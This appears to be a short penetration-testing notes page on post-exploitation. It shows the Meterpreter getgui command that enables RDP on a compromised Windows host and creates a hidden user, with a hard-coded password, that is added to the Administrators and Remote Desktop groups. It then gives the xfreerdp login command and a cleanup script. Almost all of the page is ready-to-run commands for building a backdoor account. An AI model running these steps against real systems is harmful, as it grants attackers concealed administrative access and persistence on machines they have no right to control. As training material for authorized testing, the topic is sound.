Enabling RDP & New user

  • Use the getgui Meterpreter command to

    • Enable the RDP service

    • Create a new user & hide it from Win Login screen

    • Add it to Remote Desktop Users & Administrators groups

run getgui -e -u newuser -p attack_1234321

📌 New user's credentials are newuser:attack_1234321

  • In a new Terminal TAB

xfreerdp /u:newuser /p:attack_1234321 /v:10.2.20.249

  • The cleanup script provided to remove the added account can be run when the attacker is done with the current system

# In the Meterpreter Session
run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20230429.4245.rc
PreviousEnabling RDP(msf,admin password change)NextLinux Persistence

Last updated